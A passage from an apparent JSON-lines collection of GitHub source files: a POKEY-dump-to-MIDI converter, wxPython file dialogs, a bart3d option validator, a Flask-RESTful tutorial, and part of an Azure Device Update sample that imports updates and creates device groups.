[bytes.fromhex(\"00\"*9)] * numPOKEY\n\t\t\t\t\tprint(\n\t\t\t\t\t\t(\"Mode: Mono\" if numPOKEY == 1 else \"Stereo\") + \", \" + \\\n\t\t\t\t\t\t(\"NTSC (%.2f Hz)\" % FPS_NTSC if mode == NTSC else \"PAL (%.2f Hz)\" % FPS_PAL)\n\t\t\t\t\t)\n\t\t\t\t\n\t\t\t\t# Compute timestamp by ourselves, for more precision\n\t\t\t\tt = ln*dt\n\t\t\t\t\n\t\t\t\t# Stop after a given time limit\n\t\t\t\tif self.TimeLimit is not None and t > self.TimeLimit:\n\t\t\t\t\tbreak\n\t\t\t\t\n\t\t\t\t# AUDF1 AUDC1 AUDF2 AUDC2 AUDF3 AUDC3 AUDF4 AUDC4 AUDCTL\n\t\t\t\tfor n in range(numPOKEY): # convert to raw data\n\t\t\t\t\tdata[n] = bytes.fromhex(data[n])\n\t\t\t\t\n\t\t\t\tln += 1 # increase line number\n\t\t\t\t\n\t\t\t\t# asapscan outputs one line per frame. In many cases, lines are identical\n\t\t\t\t# Since duplicate lines are meaningless (only changes in POKEY state are useful\n\t\t\t\t# for detecting musical content), we ignore duplicate lines.\n\t\t\t\t\n\t\t\t\t# If POKEY data hasn't changed, we don't need to do anything\n\t\t\t\tif data == last_data: \n\t\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t\tlast_data = data # Update previous state\n\t\t\t\t\n\t\t\t\t# Write song data (the state changes)\n\t\t\t\tsong.addState( t, data )\n\t\t\n\t\t# Initialize POKEYs\n\t\tsong.initPOKEY(numPOKEY, mode)\n\t\t\n\t\t# Compile song data into notes\n\t\tsong.compile()\n\t\t\n\t\t# Initialize MIDI\n\t\tmidi = MIDI()\n\t\t\n\t\t# If we want to trim silences, we set the MIDI time offset to the earliest sound\n\t\tif self.TrimSilence:\n\t\t\tmidi.timeOffset = song.earliestSound\n\t\t\t\n\t\t# If we want to force a known tempo, we change the MIDI tempo and the scale factor\n\t\tif self.ForceTempo is not None:\n\t\t\tmidi.scaleFactor = self.ForceTempo / DEFAULT_TEMPO\n\t\t\tmidi.tempo = self.ForceTempo\n\t\t\n\t\t# If we want to force a timebase, we do it now\n\t\tif self.ForceTimebase is not None:\n\t\t\tmidi.timebase = self.ForceTimebase\n\t\t\n\t\t# Each voice is a track\n\t\tfor v in song.voices:\n\t\t\tmt = midi.newTrack()\n\t\t\tv = v.split(\" \")\n\t\t\t# If each poly is in a separate track or not, we specify it\n\t\t\tif self.SplitPolyAsTracks:\n\t\t\t\tfmt = \"%s: Ch %s Poly %s\" if self.ShortTrackNames else \"POKEY %s Channel %s Poly %s\"\n\t\t\t\tmidi.setTrackName( mt, fmt % (v[0], int(v[1])+1, v[2]) )\n\t\t\t\tmidi.setInstrumentName( mt, \"Poly %s\" % v[2] )\n\t\t\telse:\n\t\t\t\tfmt = \"%s: Ch %s\" if self.ShortTrackNames else \"POKEY %s Channel %s\"\n\t\t\t\tmidi.setTrackName( mt, fmt % (v[0], int(v[1])+1) )\n\t\t\t\n\t\t# Current active notes for each channel\n\t\tactive_note = [ [None]*4 for pn in range(song.numPOKEY) ]\n\t\t\n\t\t# If we're detecting tempo, initialize beat counter\n\t\tif self.DetectTempo:\n\t\t\tbeats = dict()\n\t\t\n\t\t# We begin assembling the MIDI data\n\t\tprint(\"Assembling MIDI file...\")\n\t\tfor nt, t in enumerate(song.times):\n\t\t\tfor pn in range(song.numPOKEY):\n\t\t\t\tstate = song.music[t][pn]\n\t\t\t\tfor ch in range(4):\n\t\t\t\t\t\n\t\t\t\t\tvoice = self.voice(pn, ch, state['poly'][ch])\n\t\t\t\t\t\n\t\t\t\t\tmidi_track = song.voices.index(voice) + 1 # +1 due to conductor track\n\t\t\t\t\tmidi_ch = pn*4 + ch\n\t\t\t\t\t\n\t\t\t\t\tif state['note'][ch] is None:\n\t\t\t\t\t\tmidi_note = None\n\t\t\t\t\telse:\n\t\t\t\t\t\t# 21 is A0, which we're using at note 0 internally (as in the piano)\n\t\t\t\t\t\tmidi_note = state['note'][ch] + 21\n\t\t\t\t\t\n\t\t\t\t\t# In MIDI jargon, \"note velocity\" = loudness\n\t\t\t\t\t\n\t\t\t\t\t# 4-bit volume given in the melody\n\t\t\t\t\tvol = state['vol'][ch]\n\t\t\t\t\t\n\t\t\t\t\t# Volume used in MIDI (note velocity), with boost and 0-127 range\n\t\t\t\t\tmidi_vol = max(0,min(127,int(vol / 15 * 127 * self.BoostVelocity)))\n\t\t\t\t\t\n\t\t\t\t\t# If we are using channel volumes for the volume data, as opposed to note\n\t\t\t\t\t# velocity, then we always play the loudest note, but control the effect with\n\t\t\t\t\t# the channel volume\n\t\t\t\t\tif self.UseChannelVolume: \n\t\t\t\t\t\tch_vol = midi_vol\n\t\t\t\t\t\tmidi_vol = 127\n\t\t\t\t\t\n\t\t\t\t\t# If we are only considering pitch changes, we discard volume information altogether\n\t\t\t\t\tif self.PitchOnly:\n\t\t\t\t\t\tch_vol = 127 if vol > 0 else 0\n\t\t\t\t\t\tmidi_vol = 127 if vol > 0 else 0\n\t\t\t\t\t\n\t\t\t\t\t# If there's a note being played in the current channel of the current POKEY\n\t\t\t\t\tif active_note[pn][ch] is not None:\n\t\t\t\t\t\tkill = False\n\t\t\t\t\t\t\n\t\t\t\t\t\tif self.AlwaysRetrigger:\n\t\t\t\t\t\t\t# If AlwaysRetrigger is set, the previous note is always killed\n\t\t\t\t\t\t\tkill = True\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t# Otherwise, we use different heuristics to merge notes\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t# For volume changes\n\t\t\t\t\t\t\tif self.UseChannelVolume:\n\t\t\t\t\t\t\t\t# If we're using the channel volume, we update it if changed, \n\t\t\t\t\t\t\t\t# instead of sending a new note. No need to kill.\n\t\t\t\t\t\t\t\t# But ONLY if it's the same note!\n\t\t\t\t\t\t\t\tif active_note[pn][ch]['note'] == midi_note and \\\n\t\t\t\t\t\t\t\t\tactive_note[pn][ch]['vol'] != vol and \\\n\t\t\t\t\t\t\t\t\tvol > 0:\n\t\t\t\t\t\t\t\t\t\tmidi.ctrlChange(midi_track, t, midi_ch, 0x07, ch_vol)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t# Otherwise, we kill if the note is rising. This usually means\n\t\t\t\t\t\t\t\t# a re-trigger of the note in the actual music.\n\t\t\t\t\t\t\t\t# Decaying sounds are usually used for decaying envelopes, so\n\t\t\t\t\t\t\t\t# the natural decay of the MIDI note should work fine.\n\t\t\t\t\t\t\t\t# Of course, only if we have set MergeDecays to True\n\t\t\t\t\t\t\t\tif self.MergeDecays and active_note[pn][ch]['vol'] <= vol:\n\t\t\t\t\t\t\t\t\tkill = True\n\t\t\t\t\t\t\t\t# Note, however, that if a song uses a ramping up attack, this\n\t\t\t\t\t\t\t\t# just results in many quick notes rising up in volume, which\n\t\t\t\t\t\t\t\t# is usually fine.\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t# For note changes\n\t\t\t\t\t\t\t# If new note is different, always cancel old note and retrigger\n\t\t\t\t\t\t\tif active_note[pn][ch]['note'] != midi_note:\n\t\t\t\t\t\t\t\tkill = True\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t# Kill if timbre changed while keeping the note fixed\n\t\t\t\t\t\t\t# This is usually used for percussive effects\n\t\t\t\t\t\t\t# Disabled for now\n\t\t\t\t\t\t\t# TODO: verify when this happens to know exactly how to handle it\n\t\t\t\t\t\t\t# if active_note[pn][ch]['voice'] != voice:\n\t\t\t\t\t\t\t\t# print(\"Voice changed\", pn, ch)\n\t\t\t\t\t\t\t\t# exit()\n\t\t\t\t\t\t\t\t# kill = True\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t# Always kill if current volume is zero\n\t\t\t\t\t\t\tif vol == 0:\n\t\t\t\t\t\t\t\tkill = True\n\t\t\t\t\t\t\n\t\t\t\t\t\t# Send the NoteOff for the current note if marked to kill it\n\t\t\t\t\t\tif kill:\n\t\t\t\t\t\t\tmidi.noteOff(\n\t\t\t\t\t\t\t\tactive_note[pn][ch]['track'],\n\t\t\t\t\t\t\t\tt,\n\t\t\t\t\t\t\t\tmidi_ch,\n\t\t\t\t\t\t\t\tactive_note[pn][ch]['note']\n\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\tactive_note[pn][ch] = None # Mark as free to be used\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t# Otherwise, update the note state\n\t\t\t\t\t\t\tactive_note[pn][ch] = {\n\t\t\t\t\t\t\t\t'note': midi_note,\n\t\t\t\t\t\t\t\t'vol': vol,\n\t\t\t\t\t\t\t\t'track': midi_track,\n\t\t\t\t\t\t\t\t'voice': voice\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\t# If no active note, a new current note exists and volume is non-zero, we have\n\t\t\t\t\t# a new note being played\n\t\t\t\t\tif active_note[pn][ch] is None and midi_note is not None and vol > 0:\n\t\t\t\t\t\t# If we are using the channel volume, we update it here before the note\n\t\t\t\t\t\tif self.UseChannelVolume:\n\t\t\t\t\t\t\tmidi.ctrlChange(midi_track, t, midi_ch, 0x07, ch_vol)\n\t\t\t\t\t\tif self.UseInstruments:\n\t\t\t\t\t\t\tif self.CustomInstruments:\n\t\t\t\t\t\t\t\tinst = self.CustomInstruments[state['poly'][ch]]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tinst = POLY_INSTRUMENT[state['poly'][ch]]\n\t\t\t\t\t\t\tmidi.progChange(\n\t\t\t\t\t\t\t\tmidi_track, t, midi_ch,\n\t\t\t\t\t\t\t\tinst\n\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\n\t\t\t\t\t\t# If we are detecting tempo, we add the note-on times to per-voice beat\n\t\t\t\t\t\t# tracker, as long as the note is below a threshold (lower notes are\n\t\t\t\t\t\t# more likely to be related to beats), and if it's a tonal note\n\t\t\t\t\t\tif self.DetectTempo and \\\n\t\t\t\t\t\t\tstate['poly'][ch] in [5,6,7] and \\\n\t\t\t\t\t\t\tmidi_note < BPM_NOTE_THRESHOLD:\n\t\t\t\t\t\t\tif voice not in beats:\n\t\t\t\t\t\t\t\tbeats[voice] = list()\n\t\t\t\t\t\t\tbeats[voice].append(round(t / dt)) # append frame to beat\n\t\t\t\t\t\t\n\t\t\t\t\t\t# Add Note On event\n\t\t\t\t\t\tmidi.noteOn(midi_track, t, midi_ch, midi_note, midi_vol) \n\t\t\t\t\t\tactive_note[pn][ch] = {\n\t\t\t\t\t\t\t'note': midi_note,\n\t\t\t\t\t\t\t'vol': vol,\n\t\t\t\t\t\t\t'track': midi_track,\n\t\t\t\t\t\t\t'voice': voice\n\t\t\t\t\t\t} # Update active note\n\t\t\n\t\t# Once the track is done\n\t\t# Kill all leftover notes after a small offset\n\t\toffset = dt # in seconds\n\t\tfor pn in range(song.numPOKEY):\n\t\t\tfor ch in range(4):\n\t\t\t\tvoice = self.voice(pn, ch, state['poly'][ch])\n\t\t\t\tif voice not in song.voices:\n\t\t\t\t\tcontinue\n\t\t\t\tmidi_track = song.voices.index(voice) + 1\n\t\t\t\tif active_note[pn][ch] is not None:\n\t\t\t\t\tmidi.noteOff(\n\t\t\t\t\t\tactive_note[pn][ch]['track'],\n\t\t\t\t\t\tt + offset,\n\t\t\t\t\t\tmidi_ch,\n\t\t\t\t\t\tactive_note[pn][ch]['note']\n\t\t\t\t\t)\n\t\t\n\t\tif self.MarkShortNotes:\n\t\t\tmidi.filterNotesByLength(1.0 / self.ShortNoteCutoff)\n\t\t\n\t\tprint(\"Saving MIDI file at \\\"%s\\\"\" % output)\n\t\tmidi.save(output)\n\t\t\n\t\tif self.DetectTempo:\n\t\t\tconverter.detectTempo(beats, mode)\n\t\n\t# Tempo/bpm detection function\n\t# This is a VERY rudimentary algorithm, but it should work well enough for well-behaved songs\n\tdef detectTempo(self, beats, mode):\n\t\tif mode == NTSC:\n\t\t\tdt = DT_NTSC\n\t\t\tfps = FPS_NTSC\n\t\telse:\n\t\t\tdt = DT_PAL\n\t\t\tfps = FPS_PAL\n\t\t\n\t\t# For each voice\n\t\tguesses = set()\n\t\tfor v in beats:\n\t\t\tb = []\n\t\t\tfor i in range(1, len(beats[v])):\n\t\t\t\tb.append( beats[v][i] - beats[v][i-1] ) # add to a list of time differences\n\t\t\t\n\t\t\tif len(b) > BPM_COUNT_THRESHOLD:\n\t\t\t\tb = sorted(b)\n\t\t\t\tguesses.add(b[ len(b) // 2 ]) # add median difference as a possible fpb\n\t\t\n\t\t# If there ARE guesses, let's work on them\n\t\tif len(guesses) > 0:\n\t\t\tsuggestions = set() # list of reasonable suggestions\n\t\t\tfracs = [1,1/2,1/4,1/8,2,4,8,3/4,1/3,2/3,3,6,5/4,4/3] # list of reasonable fractions\n\t\t\t# We'll find all reasonable fractions of the potentially reasonable bpms found earlier\n\t\t\tfor guess in guesses:\n\t\t\t\tfor f in fracs:\n\t\t\t\t\tfpb = guess*f # suggested guess\n\t\t\t\t\tif fpb >= FPB_LIMITS[0] and fpb <= FPB_LIMITS[1]: # is it \"reasonable\"? \n\t\t\t\t\t\tsuggestions.add(round(fpb))\n\t\t\t\n\t\t\t# If there are reasonable suggestions\n\t\t\tif len(suggestions) > 0:\n\t\t\t\t# We display them\n\t\t\t\tprint(\"Possible tempos (in bpm):\")\n\t\t\t\tfor c, s in enumerate(reversed(sorted(suggestions))):\n\t\t\t\t\tbpm = 60 / (dt * s) # frames per beat to beats per minute - ToDo: shouldn't this be 60/50 for NTSC/PAL?\n\t\t\t\t\tprint(\" %16.12f\" % bpm, end=\"\")\n\t\t\t\t\tif c % 4 == 3 or c == len(suggestions)-1:\n\t\t\t\t\t\tprint(\"\")\n\t\t\t\tprint(\"Note: using high precision tempos with --bpm avoids notes drifting out of alignment.\")\n\t\t\t\treturn\n\t\t\n\t\tprint(\"Couldn't guess any tempo. Sorry!\")\n\n\n# If running by itself, handle command line options\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser(description=\"POKEY2MIDI v%s by LucasVB/1ucasvb (http://1ucasvb.com). Converts textual POKEY dumps from asapscan into MIDI files.\" % VERSION)\n\tparser.add_argument('--all', action='store_true', help=\"Use all notes by always retriggering. Useful for when notes are being missed. Overrides note merging.\")\n\tparser.add_argument('--notrim', action='store_false', help=\"Do not trim initial silence, which happens by default.\")\n\tparser.add_argument('--nosplit', action='store_false', help=\"Do not split different polynomial counter settings for channels as separate instrument tracks, which happens by default.\")\n\tparser.add_argument('--nomerge', action='store_false', help=\"Do not merge volume decays into a single MIDI note, which happens by default. Ignored if --all is used.\")\n\tparser.add_argument('--usevol', action='store_true', help=\"Use MIDI channel volume instead of note velocity. This is similar to how it happens in the actual chip.\")\n\tparser.add_argument('--pitchonly', action='store_true', help=\"Completely ignores note volume information, and considers only pitch changes when triggering notes. This is similar to --usevol, but the MIDI file will contain no channel volume MIDI messages.\")\n\tparser.add_argument('--useinst', action='store_true', help=\"Assign predefined MIDI instruments to emulate the original POKEY sound. Also use --setinst if you wish to define different instruments yourself.\")\n\tparser.add_argument('--shortnotes', metavar=\"k\", nargs=1, type=int, help=\"Assigns notes shorter than 1/k-th of a beat to separate channels. Useful for cleaning up certain songs, but may map certain notes to MIDI percussion (channel 10). Note: for now, this feature implies --nosplit.\")\n\tparser.add_argument('--shortnames', action='store_true', help=\"Use shorter MIDI track names.\")\n\tparser.add_argument('--setinst', metavar='n,n,n,n,n,n,n,n', nargs=1, type=str, help=\"Specify which General MIDI instruments to assign to each of the 8 poly settings. No spaces, n from 0 to 127. The last three are the most important for melody and default to: square wave=80, brass+lead=87, square wave=80.\")\n\tparser.add_argument('--boost', metavar='factor', nargs=1, type=float, help=\"Multiply note velocities by a factor. Useful if MIDI is too quiet. Use a large number (> 16) to make all notes have the same max loudness (useful for killing off POKEY effects that don't translate well to MIDI).\")\n\tparser.add_argument('--maxtime', metavar='time', nargs=1, type=float, help=\"By default, asapscan dumps 15 minutes (!) of POKEY data. Use this to ignore stuff after some point. Value is given is seconds, fractional values are allowed.\")\n\tparser.add_argument('--bpm', nargs=1, type=float, help=\"Assume a given tempo in beats per minute (bpm), as precisely as you want. Default is %d. If the song's bpm is known precisely, this option makes the MIDI notes align with the beats, which makes using the MIDI in other places much easier. Doesn't work if the song has a dynamic tempo.\" % DEFAULT_TEMPO)\n\tparser.add_argument('--findbpm', action='store_true', help=\"Attempts to post-process the data to automatically detect tempo/bpm by using a simple algorithm. The best guesses are merely displayed after the conversion. Run again with one of these guesses as a parameter with --bpm to see if events aligned properly. Cannot be used with --all, but might work better with --usevol.\")\n\tparser.add_argument('--timebase', nargs=1, type=int, help=\"Force a given MIDI timebase, the number of ticks in a beat (quarter note). Default is %d.\" % DEFAULT_TIMEBASE)\n\tparser.add_argument('--debug', action='store_true', help=argparse.SUPPRESS)\n\tparser.add_argument('input', metavar='input_file', type=str, nargs=1, help=\"Input POKEY dump text file.\")\n\tparser.add_argument('output', metavar='output_file', type=str, nargs=\"?\", help=\"MIDI output file. If not specified, will output to the same path, with a '.mid' extension\")\n\targs = parser.parse_args()\n\t\n\tconverter = Converter()\n\t\n\tif args.debug:\n\t\tDEBUG_POLYS = True\n\t\n\tconverter.AlwaysRetrigger = args.all\n\tconverter.MergeDecays = args.nomerge\n\tconverter.TrimSilence = args.notrim\n\tconverter.ShortTrackNames = args.shortnames\n\tconverter.SplitPolyAsTracks = args.nosplit\n\tconverter.UseChannelVolume = args.usevol\n\tconverter.PitchOnly = args.pitchonly\n\tconverter.UseInstruments = args.useinst\n\tconverter.DetectTempo = args.findbpm\n\tif args.boost is not None:\n\t\tconverter.BoostVelocity = args.boost[0]\n\tif args.maxtime is not None:\n\t\tconverter.TimeLimit = args.maxtime[0]\n\tif args.bpm is not None:\n\t\tconverter.ForceTempo = args.bpm[0]\n\tif args.timebase is not None:\n\t\tconverter.ForceTimebase = args.timebase[0]\n\tif args.useinst and args.setinst is not None:\n\t\tinsts = [min(127,max(0,int(i) if len(i) else 0)) for i in args.setinst[0].split(',')]\n\t\tinsts += [0]*(8-len(insts))\n\t\tconverter.CustomInstruments = insts\n\tif args.shortnotes is not None:\n\t\tconverter.MarkShortNotes = True\n\t\tconverter.SplitPolyAsTracks = False\n\t\tconverter.ShortNoteCutoff = args.shortnotes[0]\n\t\n\tinput = args.input[0]\n\t\n\tif args.output is not None:\n\t\toutput = args.output\n\telse:\n\t\toutput = os.path.splitext(os.path.realpath(input))[0] + \".mid\"\n\t\n\tif converter.DetectTempo and converter.AlwaysRetrigger:\n\t\tprint(\"Warning: --findbpm detection is incompatible with --all. No tempo will be detected.\")\n\t\tconverter.DetectTempo = False\n\t\n\tconverter.convert(input, output)\n\n# EOF\n","repo_name":"1ucasvb/pokey2midi","sub_path":"pokey2midi.py","file_name":"pokey2midi.py","file_ext":"py","file_size_in_byte":43038,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"41321531832","text":"import os\nimport wx\n\n_last_path = os.getcwd()\n\ndef save_project_as(parent):\n global _last_path\n dialog = wx.FileDialog(parent, \n message=\"Save Project As ...\", \n defaultDir=_last_path, \n defaultFile=\"\", \n wildcard=\"Psi project (*.psi)|*.psi\", \n style=wx.SAVE|wx.OVERWRITE_PROMPT|wx.CHANGE_DIR\n )\n status = dialog.ShowModal()\n path = dialog.GetPath()\n dialog.Destroy()\n\n if path:\n _last_path = os.path.dirname(path)\n \n if not path.endswith('.psi'):\n path += '.psi'\n\n return status, path\n\ndef open_project(parent):\n global _last_path\n dialog = wx.FileDialog(parent,\n message=\"Open Project...\",\n defaultDir=_last_path, \n defaultFile=\"\",\n wildcard=\"Psi project (*.psi)|*.psi\",\n style=wx.OPEN|wx.CHANGE_DIR\n )\n status = dialog.ShowModal()\n path = dialog.GetPath()\n dialog.Destroy()\n\n _last_path = path or _last_path\n return status, path\n\n\ndef confirm(parent, caption, message):\n dialog = wx.MessageDialog(parent, \n message=message, \n caption=caption, \n style=wx.YES_NO|wx.ICON_INFORMATION\n )\n status = dialog.ShowModal()\n dialog.Destroy()\n return status\n\ndef multichoice(parent, caption, message, choices):\n dialog = wx.MultiChoiceDialog(parent, message, caption, choices)\n status = dialog.ShowModal()\n selections = dialog.GetSelections()\n dialog.Destroy()\n return status, selections\n","repo_name":"renatopp/psi-robotics","sub_path":"psi/gui/dialogs.py","file_name":"dialogs.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73899767127","text":"import configparser\nimport os,sys,re\n\nscript_dir = os.path.dirname(os.path.realpath(__file__))\n# script_dir = os.path.dirname(script_dir)\n\ndef conf_validate():\n '''\n Read user provided path from 'bart.conf' config file\n '''\n config = configparser.ConfigParser()\n config_path = os.path.join(script_dir, 'bart3d.conf')\n if not os.path.exists(config_path):\n sys.stderr.write(\"CRITICAL: bart3d.conf does not exist in {}!\\n\".format(script_dir))\n sys.exit(1)\n config.read(config_path)\n return config\n\ndef opt_validate(options):\n '''\n Validate input options and specify used data.\n '''\n config = conf_validate()\n \n if not options.outdir:\n options.outdir = os.path.join(os.getcwd(), 'bart3d_output') # create output directory at current working directory\n \n if not options.outFileName:\n # input only contains .bam/.bed/.txt\n first_treatment_file=options.treatment.split(',')[0]\n first_control_file=options.control.split(',')[0]\n treat_base = re.split('.matrix|.hic|.cool',os.path.basename(first_treatment_file))[0]\n control_base = re.split('.matrix|.hic|.cool',os.path.basename(first_control_file))[0]\n outfile_base = '{}_OVER_{}'.format(treat_base,control_base)\n options.outFileName = outfile_base\n\n \n # === hg38 ===\n if options.species == 'hg38': \n data_dir = os.path.join(config['path']['hg38_library_dir'], 'hg38_library')\n\n # === mm10 ===\n elif options.species == 'mm10': \n data_dir = os.path.join(config['path']['mm10_library_dir'], 'mm10_library')\n \n options.normfile = data_dir+os.sep+'bart2_{}_H3K27ac.dat'.format(options.species)\n options.dhsfile = data_dir+os.sep+'bart2_{}_UDHS.bed'.format(options.species)\n options.tffile = data_dir+os.sep+'bart2_{}_TF_file.json'.format(options.species)\n options.tfoverlap = data_dir+os.sep+'bart2_{}_TF_overlap.json'.format(options.species)\n options.chromsize = script_dir+os.sep+'utility'+os.sep+'{}_clean.chrom.sizes'.format(options.species)\n options.BgToBigWig = script_dir+os.sep+'utility'+os.sep+'bedGraphToBigWig'\n \n return options\n\n","repo_name":"zanglab/bart3d","sub_path":"bart3d/OptValidator.py","file_name":"OptValidator.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"8766463112","text":"# Imports\nfrom flask import Flask, request\nfrom flask_restful import Api, Resource, reqparse, abort\nfrom flask_sqlalchemy import SQLAlchemy\n\n\n# Start flask app\napp = Flask(__name__)\napi = Api(app)\napp.config['SQLALCHEMY_DATABASE_URI'] = \"sqlite:///database.db\"\ndb = SQLAlchemy(app)\n\n\n# Models\nclass VideoModel(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(100), nullable=False)\n views = db.Column(db.Integer, nullable=False)\n likes = db.Column(db.Integer, nullable=False)\n\n def __repr__(self):\n return f\"Video(name={self.name}, views={self.views}, likes={self.likes})\"\n\n\n# with app.app_context():\n# db.create_all() # DO THIS ONLY ONCE\n\n\n# Data\npeople = {\n 'dan': {'age': 30, 'gender': 'male'},\n 'cheryl': {'age': 28, 'gender': 'female'}\n}\n\nvideos = {\n\n}\n\n# Parsers\nvideo_put_args = reqparse.RequestParser()\nvideo_put_args.add_argument('name', type=str, help='provide name as str', required=True)\nvideo_put_args.add_argument('likes', type=int, help='provide number of likes as int', required=True)\nvideo_put_args.add_argument('views', type=int, help='provide number of views as int', required=True)\n\n\n# Resources\nclass HelloWorld(Resource):\n @staticmethod\n def get(name: str):\n return people[name]\n #\n # @staticmethod\n # def post():\n # return {\"data\": \"Posted\"}\n\n\nclass Video(Resource):\n def get(self, video_id): # gets a resource\n self.abort_if_not_found(video_id)\n return videos[video_id]\n\n def post(self, video_id): # creates a resource\n self.abort_if_found(video_id)\n return self.put(video_id)\n\n @staticmethod\n def put(video_id): # creates or replaces a resource\n args = video_put_args.parse_args()\n videos[video_id] = args\n return videos[video_id], 201\n\n def delete(self, video_id): # deletes a resource\n self.abort_if_not_found(video_id)\n del videos[video_id]\n return {'msg': 'deleted'}, 204\n\n @staticmethod\n def abort_if_not_found(video_id):\n if video_id not in videos:\n abort(404, kwargs={'message': \"video_id not found...\"})\n\n @staticmethod\n def abort_if_found(video_id):\n if video_id in videos:\n abort(409, kwargs={'message': \"video_id already exists...\"})\n\n\napi.add_resource(HelloWorld, \"/helloworld/\")\napi.add_resource(Video, \"/video/\")\n\n# Main\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"danbrick92/legacyRandom","sub_path":"flask_tutorial/flaskvideo.py","file_name":"flaskvideo.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43116294536","text":"from azure.core.exceptions import HttpResponseError\nfrom azure.iot.deviceupdate import DeviceUpdateClient\nfrom azure.iot.deviceupdate.models import *\nfrom azure.identity import ClientSecretCredential\nfrom datetime import datetime, timezone\nimport json\nimport time\nfrom samples.contentfactory import ContentFactory\nfrom samples.consts import MANUFACTURER, MODEL, BLOB_CONTAINER, DEFAULT_RETRY_AFTER\n\n\nclass SampleRunner:\n def __init__(self, tenant_id, client_id, client_secret, account_endpoint, instance_id, storage_name, storage_key,\n device_id, device_tag, **kwargs):\n self._tenant_id = tenant_id\n self._client_id = client_id\n self._client_secret = client_secret\n self._storage_name = storage_name\n self._storage_key = storage_key\n self._device_id = device_id\n self._device_tag = device_tag\n self._account_endpoint = account_endpoint\n self._instance_id = instance_id\n self._delete = kwargs.pop('delete', False)\n\n credentials = ClientSecretCredential(\n tenant_id=tenant_id,\n client_id=client_id,\n client_secret=client_secret\n )\n self._client = DeviceUpdateClient(credentials, account_endpoint, instance_id)\n\n def run(self):\n version = datetime.now().strftime(\"%Y.%#m%d.%#H%M.%#S\")\n\n # Create new update and import it into ADU\n job_id = self._import_update_step(version)\n\n # Let's retrieve the existing (newly imported) update\n self._retrieve_update_step(MANUFACTURER, MODEL, version, 200)\n\n # Create deployment/device group\n group_id = self._create_deployment_group_step()\n\n # Check that device group contains devices that can be updated with our new update\n self._check_group_devices_are_up_to_date_step(group_id, MANUFACTURER, MODEL, version, False)\n\n # Create deployment for our device group to deploy our new update\n deployment_id = self._deploy_update_step(MANUFACTURER, MODEL, version, group_id)\n\n # Check device and wait until the new update is installed there\n self._check_device_updates_step(MANUFACTURER, MODEL, version)\n\n # Check that device group contains *NO* devices that can be updated with our new update\n self._check_group_devices_are_up_to_date_step(group_id, MANUFACTURER, MODEL, version, True)\n\n if self._delete:\n # Delete the update\n self._delete_update_step(MANUFACTURER, MODEL, version);\n\n # Let's retrieve the deleted update (newly imported) update and expect 404 (not found response)\n self._retrieve_update_step(MANUFACTURER, MODEL, version, 404)\n\n # Dump test data to be used for unit-testing\n self._output_test_data(version, job_id, deployment_id)\n\n def _import_update_step(self, version):\n content_factory = ContentFactory(self._storage_name, self._storage_key, BLOB_CONTAINER)\n update = content_factory.create_import_update(MANUFACTURER, MODEL, version)\n\n print(\"Importing updates...\")\n _, _, headers = self._client.updates.import_update(update, cls=callback)\n operation_id = self._get_operation_id(headers[\"Location\"])\n print(f\"Import operation id: {operation_id}\")\n\n print(\"(this may take a minute or two)\")\n repeat = True\n while repeat:\n _, operation, headers = self._client.updates.get_operation(operation_id, cls=callback)\n if operation.status == \"Succeeded\":\n print(operation.status)\n repeat = False\n elif operation.status == \"Failed\":\n error = operation.errors[0]\n raise ImportError(\"Import failed with response: \\n\" +\n json.dumps(error.__dict__, default=as_dict, sort_keys=True, indent=2))\n else:\n print(\".\", end=\"\", flush=True)\n time.sleep(self._get_retry_after(headers))\n print()\n return operation_id\n\n def _retrieve_update_step(self, provider, name, version, expected_status):\n print(\"Retrieving update...\")\n value = None\n try:\n response, value, _ = self._client.updates.get_update(provider, name, version, cls=callback)\n status_code = response.http_response.status_code\n except HttpResponseError as e:\n status_code = e.status_code\n if status_code == expected_status:\n print(f\"Received an expected status code: {expected_status}\")\n if value is not None:\n print(json.dumps(value.__dict__, default=as_dict, sort_keys=True, check_circular=False, indent=2))\n else:\n print()\n else:\n raise Exception(f\"Service returned status code: {response.http_response.status_code}\")\n print()\n\n def _create_deployment_group_step(self):\n group_id = self._device_tag\n create_new_group = False\n\n print(\"Querying deployment group...\")\n try:\n _ = self._client.devices.get_group(group_id)\n print(f\"Deployment group {group_id} already exists.\")\n except HttpResponseError as e:\n if e.status_code == 404:\n create_new_group = True\n\n if create_new_group:\n print(\"Creating deployment group...\")\n group = self._client.devices.create_or_update_group(\n group_id,\n Group(\n group_id=group_id,\n group_type=GroupType.IO_T_HUB_TAG,\n tags=[group_id],\n created_date_time=datetime.utcnow().isoformat()\n ))\n if group is not None:\n print(f\"Group {group_id} created.\")\n print()\n\n print(\"Waiting for the group to be populated with devices...\")\n print(\"(this may take about five minutes to complete)\")\n repeat = True\n while repeat:\n group = self._client.devices.get_group(group_id)\n if group.device_count > 0:\n print(f\"Deployment group {group_id} now has {group.device_count} devices.\")\n repeat = False\n else:\n print(\".\", end=\"\", flush=True)\n time.sleep(DEFAULT_RETRY_AFTER)\n print()\n return group_id\n\n def _check_group_devices_are_up_to_date_step(self, group_id, provider, name, version, is_compliant):\n print(f\"Check group {group_id} device compliance with update {provider}/{name}/{version}...\")\n update_found = False\n counter = 